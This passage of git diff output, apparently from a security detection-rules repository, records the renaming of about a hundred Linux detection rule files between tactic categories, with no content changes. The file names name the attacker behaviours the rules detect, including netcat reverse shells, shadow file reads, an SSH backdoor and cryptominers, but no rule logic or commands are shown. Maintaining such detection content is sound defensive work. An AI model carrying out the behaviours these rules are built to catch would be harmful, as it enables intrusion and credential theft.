....toml => persistence_linux_shell_activity_via_web_server.toml} | 0 ... => persistence_pluggable_authentication_module_creation.toml} | 0 ..._pluggable_authentication_module_creation_in_unusual_dir.toml} | 0 ...sistence_pluggable_authentication_module_source_download.toml} | 0 ...ap.toml => persistence_process_capability_set_via_setcap.toml} | 0 ...ity_set.toml => persistence_setuid_setgid_capability_set.toml} | 0 ...ject_creation.toml => persistence_shared_object_creation.toml} | 0 ...oml => persistence_simple_web_server_connection_accepted.toml} | 0 ..._user.toml => persistence_ssh_via_backdoored_system_user.toml} | 0 ....toml => persistence_suspicious_ssh_execution_xzbackdoor.toml} | 0 ...ontrol_systemd_netcon.toml => persistence_systemd_netcon.toml} | 0 ...vice_started.toml => persistence_systemd_service_started.toml} | 0 ...ll_execution.toml => persistence_systemd_shell_execution.toml} | 0 ..._process.toml => persistence_unusual_exim4_child_process.toml} | 0 ...sual_pam_grantor.toml => persistence_unusual_pam_grantor.toml} | 0 ...d_process.toml => persistence_unusual_sshd_child_process.toml} | 0 ...spawned.toml => persistence_web_server_sus_child_spawned.toml} | 0 ...ion.toml => persistence_web_server_sus_command_execution.toml} | 0 ...port.toml => persistence_web_server_sus_destination_port.toml} | 0 ...toml => persistence_web_server_unusual_command_execution.toml} | 0 ... privilege_escalation_chown_chmod_unauthorized_file_read.toml} | 0 ...permissions.toml => privilege_escalation_dac_permissions.toml} | 0 ...ation.toml => privilege_escalation_kworker_uid_elevation.toml} | 0 ...l => privilege_escalation_ld_preload_shared_object_modif.toml} | 0 ...l => privilege_escalation_linux_suspicious_symbolic_link.toml} | 0 ...privilege_escalation_load_and_unload_of_kernel_via_kexec.toml} | 0 ... => privilege_escalation_potential_bufferoverflow_attack.toml} | 0 ...l => privilege_escalation_potential_wildcard_shell_spawn.toml} | 0 ...oot.toml => privilege_escalation_sda_disk_mount_non_root.toml} | 0 ..._file_read.toml => privilege_escalation_shadow_file_read.toml} | 0 ...do_hijacking.toml => privilege_escalation_sudo_hijacking.toml} | 0 ...> privilege_escalation_suspicious_chown_fowner_elevation.toml} | 0 ...oml => privilege_escalation_suspicious_passwd_file_write.toml} | 0 102 files changed, 0 insertions(+), 0 deletions(-) rename rules/linux/{execution_cupsd_foomatic_rip_netcon.toml => command_and_control_cupsd_foomatic_rip_netcon.toml} (100%) rename rules/linux/{defense_evasion_linux_kworker_netcon.toml => command_and_control_linux_kworker_netcon.toml} (100%) rename rules/linux/{collection_sensitive_files.toml => credential_access_collection_sensitive_files.toml} (100%) rename rules/linux/{collection_sensitive_files_compression_inside_container.toml => credential_access_collection_sensitive_files_compression_inside_container.toml} (100%) rename rules/linux/{collection_gdb_process_hooking.toml => credential_access_gdb_process_hooking.toml} (100%) rename rules/linux/{impact_authorized_keys_file_deletion.toml => defense_evasion_authorized_keys_file_deletion.toml} (100%) rename rules/linux/{command_and_control_curl_or_wget_executed_via_lolbin.toml => defense_evasion_curl_or_wget_executed_via_lolbin.toml} (100%) rename rules/linux/{execution_interactive_shell_from_system_user.toml => defense_evasion_interactive_shell_from_system_user.toml} (100%) rename rules/linux/{persistence_ld_so_creation.toml => defense_evasion_ld_so_creation.toml} (100%) rename rules/linux/{impact_rename_esxi_files.toml => defense_evasion_rename_esxi_files.toml} (100%) rename rules/linux/{impact_user_or_group_deletion.toml => defense_evasion_user_or_group_deletion.toml} (100%) rename rules/linux/{credential_access_kubeconfig_file_discovery.toml => discovery_kubeconfig_file_discovery.toml} (100%) rename rules/linux/{credential_access_private_key_password_searching_activity.toml => discovery_private_key_password_searching_activity.toml} (100%) rename rules/linux/{credential_access_security_file_access_via_common_utility.toml => discovery_security_file_access_via_common_utility.toml} (100%) rename rules/linux/{credential_access_suspicious_network_tool_launched_inside_container.toml => discovery_suspicious_network_tool_launched_inside_container.toml} (100%) rename rules/linux/{defense_evasion_virtual_machine_fingerprinting.toml => discovery_virtual_machine_fingerprinting.toml} (100%) rename rules/linux/{defense_evasion_abnormal_process_id_file_created.toml => execution_abnormal_process_id_file_created.toml} (100%) rename rules/linux/{command_and_control_cupsd_foomatic_rip_suspicious_child_execution.toml => execution_cupsd_foomatic_rip_suspicious_child_execution.toml} (100%) rename rules/linux/{command_and_control_egress_connection_from_entrypoint_in_container.toml => execution_egress_connection_from_entrypoint_in_container.toml} (100%) rename rules/linux/{command_and_control_file_execution_followed_by_deletion.toml => execution_file_execution_followed_by_deletion.toml} (100%) rename rules/linux/{defense_evasion_file_made_executable_via_chmod_inside_container.toml => execution_file_made_executable_via_chmod_inside_container.toml} (100%) rename rules/linux/{command_and_control_file_transfer_or_listener_established_via_netcat.toml => execution_file_transfer_or_listener_established_via_netcat.toml} (100%) rename rules/linux/{credential_access_kubernetes_direct_api_request_via_curl_or_wget.toml => execution_kubernetes_direct_api_request_via_curl_or_wget.toml} (100%) rename rules/linux/{command_and_control_nc_listener_via_rlwrap.toml => execution_nc_listener_via_rlwrap.toml} (100%) rename rules/linux/{defense_evasion_netcon_from_rwx_mem_region_binary.toml => execution_netcon_from_rwx_mem_region_binary.toml} (100%) rename rules/linux/{command_and_control_network_event_post_compilation.toml => execution_network_event_post_compilation.toml} (100%) rename rules/linux/{credential_access_potential_hack_tool_executed.toml => execution_potential_hack_tool_executed.toml} (100%) rename rules/linux/{defense_evasion_process_backgrounded_by_unusual_parent.toml => execution_process_backgrounded_by_unusual_parent.toml} (100%) rename rules/linux/{defense_evasion_process_started_from_process_id_file.toml => execution_process_started_from_process_id_file.toml} (100%) rename rules/linux/{defense_evasion_process_started_in_shared_memory_directory.toml => execution_process_started_in_shared_memory_directory.toml} (100%) rename rules/linux/{defense_evasion_shell_evasion_linux_binary.toml => execution_shell_evasion_linux_binary.toml} (100%) rename rules/linux/{command_and_control_shell_openssl_client_or_server.toml => execution_shell_openssl_client_or_server.toml} (100%) rename rules/linux/{command_and_control_shell_via_background_process.toml => execution_shell_via_background_process.toml} (100%) rename rules/linux/{command_and_control_shell_via_child_tcp_utility_linux.toml => execution_shell_via_child_tcp_utility_linux.toml} (100%) rename rules/linux/{command_and_control_shell_via_lolbin_interpreter_linux.toml => execution_shell_via_lolbin_interpreter_linux.toml} (100%) rename rules/linux/{discovery_shell_via_meterpreter_linux.toml => execution_shell_via_meterpreter_linux.toml} (100%) rename rules/linux/{command_and_control_shell_via_suspicious_binary.toml => execution_shell_via_suspicious_binary.toml} (100%) rename rules/linux/{command_and_control_shell_via_tcp_cli_utility_linux.toml => execution_shell_via_tcp_cli_utility_linux.toml} (100%) rename rules/linux/{command_and_control_shell_via_udp_cli_utility_linux.toml => execution_shell_via_udp_cli_utility_linux.toml} (100%) rename rules/linux/{defense_evasion_sus_extraction_or_decrompression_via_funzip.toml => execution_sus_extraction_or_decrompression_via_funzip.toml} (100%) rename rules/linux/{discovery_suspicious_executable_running_system_commands.toml => execution_suspicious_executable_running_system_commands.toml} (100%) rename rules/linux/{impact_suspicious_mining_process_creation_events.toml => execution_suspicious_mining_process_creation_events.toml} (100%) rename rules/linux/{defense_evasion_system_binary_file_permission_change.toml => execution_system_binary_file_permission_change.toml} (100%) rename rules/linux/{defense_evasion_tc_bpf_filter.toml => execution_tc_bpf_filter.toml} (100%) rename rules/linux/{defense_evasion_unusual_kthreadd_execution.toml => execution_unusual_kthreadd_execution.toml} (100%) rename rules/linux/{defense_evasion_unusual_path_invocation_from_command_line.toml => execution_unusual_path_invocation_from_command_line.toml} (100%) rename rules/linux/{privilege_escalation_unusual_pkexec_execution.toml => execution_unusual_pkexec_execution.toml} (100%) rename rules/linux/{collection_potential_database_dumping.toml => exfiltration_potential_database_dumping.toml} (100%) rename rules/linux/{credential_access_potential_bruteforce_malware_infection.toml => impact_potential_bruteforce_malware_infection.toml} (100%) rename rules/linux/{credential_access_kubeconfig_file_activity.toml => lateral_movement_kubeconfig_file_activity.toml} (100%) rename rules/linux/{command_and_control_ssh_it_worm_download.toml => lateral_movement_ssh_it_worm_download.toml} (100%) rename rules/linux/{command_and_control_telnet_network_activity_external.toml => lateral_movement_telnet_network_activity_external.toml} (100%) rename rules/linux/{execution_apt_package_manager_execution.toml => persistence_apt_package_manager_execution.toml} (100%) rename rules/linux/{execution_apt_package_manager_netcon.toml => persistence_apt_package_manager_netcon.toml} (100%) rename rules/linux/{execution_at_job_creation.toml => persistence_at_job_creation.toml} (100%) rename rules/linux/{defense_evasion_boot_file_copy.toml => persistence_boot_file_copy.toml} (100%) rename rules/linux/{defense_evasion_bpf_probe_write_user.toml => persistence_bpf_probe_write_user.toml} (100%) rename rules/linux/{defense_evasion_bpf_program_or_map_load.toml => persistence_bpf_program_or_map_load.toml} (100%) rename rules/linux/{credential_access_modify_ssh_binaries.toml => persistence_credential_access_modify_ssh_binaries.toml} (100%) rename rules/linux/{execution_cron_job_creation.toml => persistence_cron_job_creation.toml} (100%) rename rules/linux/{execution_dbus_unsual_daemon_parent_execution.toml => persistence_dbus_unsual_daemon_parent_execution.toml} (100%) rename rules/linux/{execution_git_hook_execution.toml => persistence_git_hook_execution.toml} (100%) rename rules/linux/{command_and_control_git_hook_netcon.toml => persistence_git_hook_netcon.toml} (100%) rename rules/linux/{execution_git_hook_process_execution.toml => persistence_git_hook_process_execution.toml} (100%) rename rules/linux/{defense_evasion_insmod_kernel_module_load.toml => persistence_insmod_kernel_module_load.toml} (100%) rename rules/linux/{defense_evasion_kernel_driver_load.toml => persistence_kernel_driver_load.toml} (100%) rename rules/linux/{defense_evasion_kernel_driver_load_by_non_root.toml => persistence_kernel_driver_load_by_non_root.toml} (100%) rename rules/linux/{defense_evasion_kernel_module_load_from_unusual_location.toml => persistence_kernel_module_load_from_unusual_location.toml} (100%) rename rules/linux/{defense_evasion_kworker_file_creation.toml => persistence_kworker_file_creation.toml} (100%) rename rules/linux/{initial_access_linux_shell_activity_via_web_server.toml => persistence_linux_shell_activity_via_web_server.toml} (100%) rename rules/linux/{credential_access_pluggable_authentication_module_creation.toml => persistence_pluggable_authentication_module_creation.toml} (100%) rename rules/linux/{credential_access_pluggable_authentication_module_creation_in_unusual_dir.toml => persistence_pluggable_authentication_module_creation_in_unusual_dir.toml} (100%) rename rules/linux/{command_and_control_pluggable_authentication_module_source_download.toml => persistence_pluggable_authentication_module_source_download.toml} (100%) rename rules/linux/{privilege_escalation_process_capability_set_via_setcap.toml => persistence_process_capability_set_via_setcap.toml} (100%) rename rules/linux/{privilege_escalation_setuid_setgid_capability_set.toml => persistence_setuid_setgid_capability_set.toml} (100%) rename rules/linux/{defense_evasion_shared_object_creation.toml => persistence_shared_object_creation.toml} (100%) rename rules/linux/{command_and_control_simple_web_server_connection_accepted.toml => persistence_simple_web_server_connection_accepted.toml} (100%) rename rules/linux/{initial_access_ssh_via_backdoored_system_user.toml => persistence_ssh_via_backdoored_system_user.toml} (100%) rename rules/linux/{execution_suspicious_ssh_execution_xzbackdoor.toml => persistence_suspicious_ssh_execution_xzbackdoor.toml} (100%) rename rules/linux/{command_and_control_systemd_netcon.toml => persistence_systemd_netcon.toml} (100%) rename rules/linux/{execution_systemd_service_started.toml => persistence_systemd_service_started.toml} (100%) rename rules/linux/{execution_systemd_shell_execution.toml => persistence_systemd_shell_execution.toml} (100%) rename rules/linux/{execution_unusual_exim4_child_process.toml => persistence_unusual_exim4_child_process.toml} (100%) rename rules/linux/{defense_evasion_unusual_pam_grantor.toml => persistence_unusual_pam_grantor.toml} (100%) rename rules/linux/{lateral_movement_unusual_sshd_child_process.toml => persistence_unusual_sshd_child_process.toml} (100%) rename rules/linux/{execution_web_server_sus_child_spawned.toml => persistence_web_server_sus_child_spawned.toml} (100%) rename rules/linux/{execution_web_server_sus_command_execution.toml => persistence_web_server_sus_command_execution.toml} (100%) rename rules/linux/{command_and_control_web_server_sus_destination_port.toml => persistence_web_server_sus_destination_port.toml} (100%) rename rules/linux/{execution_web_server_unusual_command_execution.toml => persistence_web_server_unusual_command_execution.toml} (100%) rename rules/linux/{defense_evasion_chown_chmod_unauthorized_file_read.toml => privilege_escalation_chown_chmod_unauthorized_file_read.toml} (100%) rename rules/linux/{credential_access_dac_permissions.toml => privilege_escalation_dac_permissions.toml} (100%) rename rules/linux/{defense_evasion_kworker_uid_elevation.toml => privilege_escalation_kworker_uid_elevation.toml} (100%) rename rules/linux/{persistence_ld_preload_shared_object_modif.toml => privilege_escalation_ld_preload_shared_object_modif.toml} (100%) rename rules/linux/{persistence_linux_suspicious_symbolic_link.toml => privilege_escalation_linux_suspicious_symbolic_link.toml} (100%) rename rules/linux/{defense_evasion_load_and_unload_of_kernel_via_kexec.toml => privilege_escalation_load_and_unload_of_kernel_via_kexec.toml} (100%) rename rules/linux/{initial_access_potential_bufferoverflow_attack.toml => privilege_escalation_potential_bufferoverflow_attack.toml} (100%) rename rules/linux/{execution_potential_wildcard_shell_spawn.toml => privilege_escalation_potential_wildcard_shell_spawn.toml} (100%) rename rules/linux/{defense_evasion_sda_disk_mount_non_root.toml => privilege_escalation_sda_disk_mount_non_root.toml} (100%) rename rules/linux/{credential_access_shadow_file_read.toml => privilege_escalation_shadow_file_read.toml} (100%) rename rules/linux/{persistence_sudo_hijacking.toml => privilege_escalation_sudo_hijacking.toml} (100%) rename rules/linux/{defense_evasion_suspicious_chown_fowner_elevation.toml => privilege_escalation_suspicious_chown_fowner_elevation.toml} (100%) rename rules/linux/{persistence_suspicious_passwd_file_write.toml => privilege_escalation_suspicious_passwd_file_write.toml} (100%) diff --git a/rules/linux/execution_cupsd_foomatic_rip_netcon.toml b/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml similarity index 100% rename from rules/linux/execution_cupsd_foomatic_rip_netcon.toml rename to rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml diff --git a/rules/linux/defense_evasion_linux_kworker_netcon.toml b/rules/linux/command_and_control_linux_kworker_netcon.toml similarity index 100% rename from rules/linux/defense_evasion_linux_kworker_netcon.toml rename to rules/linux/command_and_control_linux_kworker_netcon.toml diff --git a/rules/linux/collection_sensitive_files.toml b/rules/linux/credential_access_collection_sensitive_files.toml similarity index 100% rename from rules/linux/collection_sensitive_files.toml rename to rules/linux/credential_access_collection_sensitive_files.toml diff --git a/rules/linux/collection_sensitive_files_compression_inside_container.toml b/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml similarity index 100% rename from rules/linux/collection_sensitive_files_compression_inside_container.toml rename to rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml diff --git a/rules/linux/collection_gdb_process_hooking.toml b/rules/linux/credential_access_gdb_process_hooking.toml similarity index 100% rename from rules/linux/collection_gdb_process_hooking.toml rename to rules/linux/credential_access_gdb_process_hooking.toml diff --git a/rules/linux/impact_authorized_keys_file_deletion.toml b/rules/linux/defense_evasion_authorized_keys_file_deletion.toml similarity index 100% rename from rules/linux/impact_authorized_keys_file_deletion.toml rename to rules/linux/defense_evasion_authorized_keys_file_deletion.toml diff --git a/rules/linux/command_and_control_curl_or_wget_executed_via_lolbin.toml b/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml similarity index 100% rename from rules/linux/command_and_control_curl_or_wget_executed_via_lolbin.toml rename to rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml diff --git a/rules/linux/execution_interactive_shell_from_system_user.toml b/rules/linux/defense_evasion_interactive_shell_from_system_user.toml similarity index 100% rename from rules/linux/execution_interactive_shell_from_system_user.toml rename to rules/linux/defense_evasion_interactive_shell_from_system_user.toml diff --git a/rules/linux/persistence_ld_so_creation.toml b/rules/linux/defense_evasion_ld_so_creation.toml similarity index 100% rename from rules/linux/persistence_ld_so_creation.toml rename to rules/linux/defense_evasion_ld_so_creation.toml diff --git a/rules/linux/impact_rename_esxi_files.toml b/rules/linux/defense_evasion_rename_esxi_files.toml similarity index 100% rename from rules/linux/impact_rename_esxi_files.toml rename to rules/linux/defense_evasion_rename_esxi_files.toml diff --git a/rules/linux/impact_user_or_group_deletion.toml b/rules/linux/defense_evasion_user_or_group_deletion.toml similarity index 100% rename from rules/linux/impact_user_or_group_deletion.toml rename to rules/linux/defense_evasion_user_or_group_deletion.toml diff --git a/rules/linux/credential_access_kubeconfig_file_discovery.toml b/rules/linux/discovery_kubeconfig_file_discovery.toml similarity index 100% rename from rules/linux/credential_access_kubeconfig_file_discovery.toml rename to rules/linux/discovery_kubeconfig_file_discovery.toml diff --git a/rules/linux/credential_access_private_key_password_searching_activity.toml b/rules/linux/discovery_private_key_password_searching_activity.toml similarity index 100% rename from rules/linux/credential_access_private_key_password_searching_activity.toml rename to rules/linux/discovery_private_key_password_searching_activity.toml diff --git a/rules/linux/credential_access_security_file_access_via_common_utility.toml b/rules/linux/discovery_security_file_access_via_common_utility.toml similarity index 100% rename from rules/linux/credential_access_security_file_access_via_common_utility.toml rename to rules/linux/discovery_security_file_access_via_common_utility.toml diff --git a/rules/linux/credential_access_suspicious_network_tool_launched_inside_container.toml b/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml similarity index 100% rename from rules/linux/credential_access_suspicious_network_tool_launched_inside_container.toml rename to rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml diff --git a/rules/linux/defense_evasion_virtual_machine_fingerprinting.toml b/rules/linux/discovery_virtual_machine_fingerprinting.toml similarity index 100% rename from rules/linux/defense_evasion_virtual_machine_fingerprinting.toml rename to rules/linux/discovery_virtual_machine_fingerprinting.toml diff --git a/rules/linux/defense_evasion_abnormal_process_id_file_created.toml b/rules/linux/execution_abnormal_process_id_file_created.toml similarity index 100% rename from rules/linux/defense_evasion_abnormal_process_id_file_created.toml rename to rules/linux/execution_abnormal_process_id_file_created.toml diff --git a/rules/linux/command_and_control_cupsd_foomatic_rip_suspicious_child_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml similarity index 100% rename from rules/linux/command_and_control_cupsd_foomatic_rip_suspicious_child_execution.toml rename to rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml diff --git a/rules/linux/command_and_control_egress_connection_from_entrypoint_in_container.toml b/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml similarity index 100% rename from rules/linux/command_and_control_egress_connection_from_entrypoint_in_container.toml rename to rules/linux/execution_egress_connection_from_entrypoint_in_container.toml diff --git a/rules/linux/command_and_control_file_execution_followed_by_deletion.toml b/rules/linux/execution_file_execution_followed_by_deletion.toml similarity index 100% rename from rules/linux/command_and_control_file_execution_followed_by_deletion.toml rename to rules/linux/execution_file_execution_followed_by_deletion.toml diff --git a/rules/linux/defense_evasion_file_made_executable_via_chmod_inside_container.toml b/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml similarity index 100% rename from rules/linux/defense_evasion_file_made_executable_via_chmod_inside_container.toml rename to rules/linux/execution_file_made_executable_via_chmod_inside_container.toml diff --git a/rules/linux/command_and_control_file_transfer_or_listener_established_via_netcat.toml b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml similarity index 100% rename from rules/linux/command_and_control_file_transfer_or_listener_established_via_netcat.toml rename to rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml diff --git a/rules/linux/credential_access_kubernetes_direct_api_request_via_curl_or_wget.toml b/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml similarity index 100% rename from rules/linux/credential_access_kubernetes_direct_api_request_via_curl_or_wget.toml rename to rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml diff --git a/rules/linux/command_and_control_nc_listener_via_rlwrap.toml b/rules/linux/execution_nc_listener_via_rlwrap.toml similarity index 100% rename from rules/linux/command_and_control_nc_listener_via_rlwrap.toml rename to rules/linux/execution_nc_listener_via_rlwrap.toml diff --git a/rules/linux/defense_evasion_netcon_from_rwx_mem_region_binary.toml b/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml similarity index 100% rename from rules/linux/defense_evasion_netcon_from_rwx_mem_region_binary.toml rename to rules/linux/execution_netcon_from_rwx_mem_region_binary.toml diff --git a/rules/linux/command_and_control_network_event_post_compilation.toml b/rules/linux/execution_network_event_post_compilation.toml similarity index 100% rename from rules/linux/command_and_control_network_event_post_compilation.toml rename to rules/linux/execution_network_event_post_compilation.toml diff --git a/rules/linux/credential_access_potential_hack_tool_executed.toml b/rules/linux/execution_potential_hack_tool_executed.toml similarity index 100% rename from rules/linux/credential_access_potential_hack_tool_executed.toml rename to rules/linux/execution_potential_hack_tool_executed.toml diff --git a/rules/linux/defense_evasion_process_backgrounded_by_unusual_parent.toml b/rules/linux/execution_process_backgrounded_by_unusual_parent.toml similarity index 100% rename from rules/linux/defense_evasion_process_backgrounded_by_unusual_parent.toml rename to rules/linux/execution_process_backgrounded_by_unusual_parent.toml diff --git a/rules/linux/defense_evasion_process_started_from_process_id_file.toml b/rules/linux/execution_process_started_from_process_id_file.toml similarity index 100% rename from rules/linux/defense_evasion_process_started_from_process_id_file.toml rename to rules/linux/execution_process_started_from_process_id_file.toml diff --git a/rules/linux/defense_evasion_process_started_in_shared_memory_directory.toml b/rules/linux/execution_process_started_in_shared_memory_directory.toml similarity index 100% rename from rules/linux/defense_evasion_process_started_in_shared_memory_directory.toml rename to rules/linux/execution_process_started_in_shared_memory_directory.toml diff --git a/rules/linux/defense_evasion_shell_evasion_linux_binary.toml b/rules/linux/execution_shell_evasion_linux_binary.toml similarity index 100% rename from rules/linux/defense_evasion_shell_evasion_linux_binary.toml rename to rules/linux/execution_shell_evasion_linux_binary.toml diff --git a/rules/linux/command_and_control_shell_openssl_client_or_server.toml b/rules/linux/execution_shell_openssl_client_or_server.toml similarity index 100% rename from rules/linux/command_and_control_shell_openssl_client_or_server.toml rename to rules/linux/execution_shell_openssl_client_or_server.toml diff --git a/rules/linux/command_and_control_shell_via_background_process.toml b/rules/linux/execution_shell_via_background_process.toml similarity index 100% rename from rules/linux/command_and_control_shell_via_background_process.toml rename to rules/linux/execution_shell_via_background_process.toml diff --git a/rules/linux/command_and_control_shell_via_child_tcp_utility_linux.toml b/rules/linux/execution_shell_via_child_tcp_utility_linux.toml similarity index 100% rename from rules/linux/command_and_control_shell_via_child_tcp_utility_linux.toml rename to rules/linux/execution_shell_via_child_tcp_utility_linux.toml diff --git a/rules/linux/command_and_control_shell_via_lolbin_interpreter_linux.toml b/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml similarity index 100% rename from rules/linux/command_and_control_shell_via_lolbin_interpreter_linux.toml rename to rules/linux/execution_shell_via_lolbin_interpreter_linux.toml diff --git a/rules/linux/discovery_shell_via_meterpreter_linux.toml b/rules/linux/execution_shell_via_meterpreter_linux.toml similarity index 100% rename from rules/linux/discovery_shell_via_meterpreter_linux.toml rename to rules/linux/execution_shell_via_meterpreter_linux.toml diff --git a/rules/linux/command_and_control_shell_via_suspicious_binary.toml b/rules/linux/execution_shell_via_suspicious_binary.toml similarity index 100% rename from rules/linux/command_and_control_shell_via_suspicious_binary.toml rename to rules/linux/execution_shell_via_suspicious_binary.toml diff --git a/rules/linux/command_and_control_shell_via_tcp_cli_utility_linux.toml b/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml similarity index 100% rename from rules/linux/command_and_control_shell_via_tcp_cli_utility_linux.toml rename to rules/linux/execution_shell_via_tcp_cli_utility_linux.toml diff --git a/rules/linux/command_and_control_shell_via_udp_cli_utility_linux.toml b/rules/linux/execution_shell_via_udp_cli_utility_linux.toml similarity index 100% rename from rules/linux/command_and_control_shell_via_udp_cli_utility_linux.toml rename to rules/linux/execution_shell_via_udp_cli_utility_linux.toml diff --git a/rules/linux/defense_evasion_sus_extraction_or_decrompression_via_funzip.toml b/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml similarity index 100% rename from rules/linux/defense_evasion_sus_extraction_or_decrompression_via_funzip.toml rename to rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml diff --git a/rules/linux/discovery_suspicious_executable_running_system_commands.toml b/rules/linux/execution_suspicious_executable_running_system_commands.toml similarity index 100% rename from rules/linux/discovery_suspicious_executable_running_system_commands.toml rename to rules/linux/execution_suspicious_executable_running_system_commands.toml diff --git a/rules/linux/impact_suspicious_mining_process_creation_events.toml b/rules/linux/execution_suspicious_mining_process_creation_events.toml similarity index 100% rename from rules/linux/impact_suspicious_mining_process_creation_events.toml rename to rules/linux/execution_suspicious_mining_process_creation_events.toml diff --git a/rules/linux/defense_evasion_system_binary_file_permission_change.toml b/rules/linux/execution_system_binary_file_permission_change.toml similarity index 100% rename from rules/linux/defense_evasion_system_binary_file_permission_change.toml rename to rules/linux/execution_system_binary_file_permission_change.toml diff --git a/rules/linux/defense_evasion_tc_bpf_filter.toml b/rules/linux/execution_tc_bpf_filter.toml similarity index 100% rename from rules/linux/defense_evasion_tc_bpf_filter.toml rename to rules/linux/execution_tc_bpf_filter.toml diff --git a/rules/linux/defense_evasion_unusual_kthreadd_execution.toml b/rules/linux/execution_unusual_kthreadd_execution.toml similarity index 100% rename from rules/linux/defense_evasion_unusual_kthreadd_execution.toml rename to rules/linux/execution_unusual_kthreadd_execution.toml diff --git a/rules/linux/defense_evasion_unusual_path_invocation_from_command_line.toml b/rules/linux/execution_unusual_path_invocation_from_command_line.toml similarity index 100% rename from rules/linux/defense_evasion_unusual_path_invocation_from_command_line.toml rename to rules/linux/execution_unusual_path_invocation_from_command_line.toml diff --git a/rules/linux/privilege_escalation_unusual_pkexec_execution.toml b/rules/linux/execution_unusual_pkexec_execution.toml similarity index 100% rename from rules/linux/privilege_escalation_unusual_pkexec_execution.toml rename to rules/linux/execution_unusual_pkexec_execution.toml diff --git a/rules/linux/collection_potential_database_dumping.toml b/rules/linux/exfiltration_potential_database_dumping.toml similarity index 100% rename from rules/linux/collection_potential_database_dumping.toml rename to rules/linux/exfiltration_potential_database_dumping.toml diff --git a/rules/linux/credential_access_potential_bruteforce_malware_infection.toml b/rules/linux/impact_potential_bruteforce_malware_infection.toml similarity index 100% rename from rules/linux/credential_access_potential_bruteforce_malware_infection.toml rename to rules/linux/impact_potential_bruteforce_malware_infection.toml diff --git a/rules/linux/credential_access_kubeconfig_file_activity.toml b/rules/linux/lateral_movement_kubeconfig_file_activity.toml similarity index 100% rename from rules/linux/credential_access_kubeconfig_file_activity.toml rename to rules/linux/lateral_movement_kubeconfig_file_activity.toml diff --git a/rules/linux/command_and_control_ssh_it_worm_download.toml b/rules/linux/lateral_movement_ssh_it_worm_download.toml similarity index 100% rename from rules/linux/command_and_control_ssh_it_worm_download.toml rename to rules/linux/lateral_movement_ssh_it_worm_download.toml diff --git a/rules/linux/command_and_control_telnet_network_activity_external.toml b/rules/linux/lateral_movement_telnet_network_activity_external.toml similarity index 100% rename from rules/linux/command_and_control_telnet_network_activity_external.toml rename to rules/linux/lateral_movement_telnet_network_activity_external.toml diff --git a/rules/linux/execution_apt_package_manager_execution.toml b/rules/linux/persistence_apt_package_manager_execution.toml similarity index 100% rename from rules/linux/execution_apt_package_manager_execution.toml rename to rules/linux/persistence_apt_package_manager_execution.toml diff --git a/rules/linux/execution_apt_package_manager_netcon.toml b/rules/linux/persistence_apt_package_manager_netcon.toml similarity index 100% rename from rules/linux/execution_apt_package_manager_netcon.toml rename to rules/linux/persistence_apt_package_manager_netcon.toml diff --git a/rules/linux/execution_at_job_creation.toml b/rules/linux/persistence_at_job_creation.toml similarity index 100% rename from rules/linux/execution_at_job_creation.toml rename to rules/linux/persistence_at_job_creation.toml diff --git a/rules/linux/defense_evasion_boot_file_copy.toml b/rules/linux/persistence_boot_file_copy.toml similarity index 100% rename from rules/linux/defense_evasion_boot_file_copy.toml rename to rules/linux/persistence_boot_file_copy.toml diff --git a/rules/linux/defense_evasion_bpf_probe_write_user.toml b/rules/linux/persistence_bpf_probe_write_user.toml similarity index 100% rename from rules/linux/defense_evasion_bpf_probe_write_user.toml rename to rules/linux/persistence_bpf_probe_write_user.toml diff --git a/rules/linux/defense_evasion_bpf_program_or_map_load.toml b/rules/linux/persistence_bpf_program_or_map_load.toml similarity index 100% rename from rules/linux/defense_evasion_bpf_program_or_map_load.toml rename to rules/linux/persistence_bpf_program_or_map_load.toml diff --git a/rules/linux/credential_access_modify_ssh_binaries.toml b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml similarity index 100% rename from rules/linux/credential_access_modify_ssh_binaries.toml rename to rules/linux/persistence_credential_access_modify_ssh_binaries.toml diff --git a/rules/linux/execution_cron_job_creation.toml b/rules/linux/persistence_cron_job_creation.toml similarity index 100% rename from rules/linux/execution_cron_job_creation.toml rename to rules/linux/persistence_cron_job_creation.toml diff --git a/rules/linux/execution_dbus_unsual_daemon_parent_execution.toml b/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml similarity index 100% rename from rules/linux/execution_dbus_unsual_daemon_parent_execution.toml rename to rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml diff --git a/rules/linux/execution_git_hook_execution.toml b/rules/linux/persistence_git_hook_execution.toml similarity index 100% rename from rules/linux/execution_git_hook_execution.toml rename to rules/linux/persistence_git_hook_execution.toml diff --git a/rules/linux/command_and_control_git_hook_netcon.toml b/rules/linux/persistence_git_hook_netcon.toml similarity index 100% rename from rules/linux/command_and_control_git_hook_netcon.toml rename to rules/linux/persistence_git_hook_netcon.toml diff --git a/rules/linux/execution_git_hook_process_execution.toml b/rules/linux/persistence_git_hook_process_execution.toml similarity index 100% rename from rules/linux/execution_git_hook_process_execution.toml rename to rules/linux/persistence_git_hook_process_execution.toml diff --git a/rules/linux/defense_evasion_insmod_kernel_module_load.toml b/rules/linux/persistence_insmod_kernel_module_load.toml similarity index 100% rename from rules/linux/defense_evasion_insmod_kernel_module_load.toml rename to rules/linux/persistence_insmod_kernel_module_load.toml diff --git a/rules/linux/defense_evasion_kernel_driver_load.toml b/rules/linux/persistence_kernel_driver_load.toml similarity index 100% rename from rules/linux/defense_evasion_kernel_driver_load.toml rename to 